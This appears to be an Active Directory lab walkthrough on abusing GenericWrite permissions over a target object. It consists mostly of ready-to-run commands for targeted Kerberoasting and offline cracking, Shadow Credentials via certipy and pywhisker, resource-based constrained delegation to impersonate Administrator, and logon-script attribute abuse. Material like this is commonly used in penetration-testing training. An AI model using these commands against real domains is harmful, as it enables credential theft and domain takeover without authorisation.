Set variables:
export DC=10.10.10.200
export DOMAIN=ootw.local
export USER=ben.carter
export PASS='StudentPass2026!'
export TARGET=svc_web
Inspect the target first. GenericWrite is attribute-level abuse, so the target type and current attributes decide the path.
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" get object $TARGET --attr sAMAccountName,objectClass,servicePrincipalName,msDS-KeyCredentialLink,scriptPath,msDS-AllowedToActOnBehalfOfOtherIdentity
Targeted Kerberoast
If the target is a user or service account and servicePrincipalName can be modified, add a fake SPN, request a service ticket, and crack it offline.
For the lab account, the SPN list starts empty. In a real environment, capture the original SPNs first and restore them exactly.
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" get object $TARGET --attr servicePrincipalName
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" set object $TARGET servicePrincipalName -v 'ootw/fake'
GetUserSPNs.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request-user $TARGET -outputfile "$TARGET.tgs"
hashcat -m 13100 "$TARGET.tgs" /usr/share/wordlists/rockyou.txt
Restore the attribute after the ticket is captured.
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" set object $TARGET servicePrincipalName -v ''
Shadow Credentials
If msDS-KeyCredentialLink can be written, use Shadow Credentials instead of changing the password.
certipy shadow auto -u $USER@$DOMAIN -p "$PASS" -account $TARGET -dc-ip $DC
Manual pyWhisker and PKINIT path:
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target $TARGET --action add --filename "$TARGET"
python3 gettgtpkinit.py -cert-pfx "$TARGET.pfx" -pfx-pass PFX_PASSWORD $DOMAIN/$TARGET "$TARGET.ccache"
export KRB5CCNAME="$TARGET.ccache"
klist
Computer Target: RBCD Bridge
If the target is a computer object, GenericWrite may allow writing delegation-related attributes. The common path is to create or control a machine account, write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer, then request a service ticket as a privileged user to that host.
addcomputer.py "$DOMAIN/$USER:$PASS" -dc-ip $DC -computer-name 'LABATTACK$' -computer-pass 'MachinePass2026!'
rbcd.py -delegate-from 'LABATTACK$' -delegate-to 'TARGETCOMPUTER$' -dc-ip $DC -action write "$DOMAIN/$USER:$PASS"
getST.py -spn cifs/TARGETCOMPUTER.ootw.local -impersonate Administrator -dc-ip $DC "$DOMAIN/LABATTACK$:MachinePass2026!"
export KRB5CCNAME=Administrator.ccache
nxc smb TARGETCOMPUTER.ootw.local -k --use-kcache
Logon Script Attribute
If the target user performs interactive logons and logon scripts are processed, scriptPath can be abused. This is noisier and less reliable than Kerberoasting or Shadow Credentials, but it is still a valid GenericWrite path.
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" set object $TARGET scriptPath -v 'logon.bat'
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" get object $TARGET --attr scriptPath
Clear the attribute after validation:
bloodyAD -d $DOMAIN --host $DC -u $USER -p "$PASS" set object $TARGET scriptPath -v ''